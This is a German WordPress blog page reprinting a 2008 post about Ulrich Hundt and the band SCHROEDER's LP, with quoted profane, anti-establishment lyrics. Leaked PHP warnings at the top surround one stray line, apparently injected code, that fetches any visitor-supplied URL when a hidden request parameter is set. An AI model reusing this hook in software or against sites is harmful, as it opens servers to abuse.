Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » Amok-Rocker

Amok-Rocker

Schroeder am 19. November 2008

Sensation! Ulrich Hundt & Schroeder auf freiem Fuß…!!!

Ulrich Hundt, 32 (Kaliber 45!), Sänger, Dichter, Produzent, Verleger, Alkoholiker, Ehemann, Vater, abnorm, pervers, monströs, wahnsinnig, arbeitsscheu, dreckig, ungesund, dazwischen, ist manchmal glücklich und hat jetzt mit der Gruppe “SCHROEDER” die LP “Sensationell! Ulrich Hundt & Schröder: auf freiem Fuß!” gemacht. Diese Mischung aus “Udo Lindenberg”, “Ton, Steine, Scherben” und “Bläck Fööß” könnte als “Schmock-Rock” in die Musikgeschichte eingehen.

“Du weißt - sie wollen uns nur noch weiter runterkriegen/ damit sie umso besser auf dir rumscheißen können, dir in/ die fresse kotzen können, in die Haare pissen + dich/ an den eiern aufhängen können, ihre Kompromisse sind/ faul, ihre psychosteinbrüche gleich die ecke rum, es ist/ die subtile scheiße: der schleim aus eurem radio, tu/ video; 10 Jahre zwangsfernsehen jawohl/ herr drecksbulle, schmutz auf dich/ aber ich schwöre euch/ es besteht Hoffnung/ berechtigte Hoffnung/ große Hoffnung …” schreibt Ulrich Hundt in seinem 1976 selbst verlegten Gedichtband “gib mir deine tripperspritze” und ähnlich aggressiv hören sich seine Texte auch jetzt auf seiner ersten Platte an: “mir wird ganz schlecht, wenn ich am fernseher dreh/ und dann erst recht, wenn ich die nachrichten seh/ jeden Tag wird’s schlimmer wird’s ein bißchen mehr/ die träume von gewalt schon beim Geschlechtsverkehr/ ich seh nur Hass und Wut und Zorn und Aggression/ und Wahnsinn, Terror mord und miese Korruption/ und der schatten der vor meiner Haustür steht/ nimmt mich morgen vielleicht schon beim verhör ins gebet…”

Ulrich Hundt aus Köln Kalk macht schon seit mehr als 15 Jahren Musik: zunächst imitierte er Bob Dylan, danach gründete er zusammen mit Alex-Superstar die Gruppe “PLAYBOYS”. Man tingelte hauptsächlich in Spanien herum, sang englische Texte, träumte von der Weltkarriere und vielen Groupies…

Doch diese Illusionen sind dahin: als Matrose auf einer spanischen Luxusyacht, als Fahrer von Trude Herr in der Sahara, als Gastwirt der Chaos-Kneipe “Madhouse”, als Hilfsarbeiter mit Abitur, als abgebrochener Philosophie-Student, als Ehemann von Gisela (“ich liebe meine Uli”) und als Vater von Tochter Susanne (6) blies Ulrich in den letzten Jahren der Wind kräftig ins Gesicht. Das hat ihn sarkastisch, manchmal zynisch werden lassen; den Humor und den Willen zur Kreativität aber nicht weggefegt … im Gegenteil: Aus verschwommenen Vorstellungen “was machen zu wollen” ist die konkrete Absicht geworden, “den alltäglichen und nichtalltäglichen Irrsinn zu beschreiben”. “Wie die Leute verarscht werden und selber verarschen … es muß alles besser werden … ein Steinchen ans andere … gegen Anpassung … es geht nicht um Trends sondern um Identität…” So und ähnlich beschreibt “Individual-Anarchist” Hundt die Motivation, zusammen mit der “Amok-Formation SCHROEDER” (Gert Beracz, Rich Schwab, Manfred und Richard Herten) auf dem Schlachtfeld der bundesrepublikanischen Wirklichkeit den kulturellen Guerillakrieg aufzunehmen…. Deutschland, Deutschland/ mir stinkt alles/ was dir selbst an dir gefällt/ Einigkeit und recht und Freiheit/ wurden doch zu sehr gequält/ Korruption gewalt und Willkür/ geht dem Staat leicht von der Hand/ denk auch mal an deine Kinder/ denke deutsches Vaterland.” Hundt & SCHROEDER” hoffentlich weiter auf freiem Fuß!

Bernd Schmitz

Abgelegt unter Historisches | Keine Kommentare

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben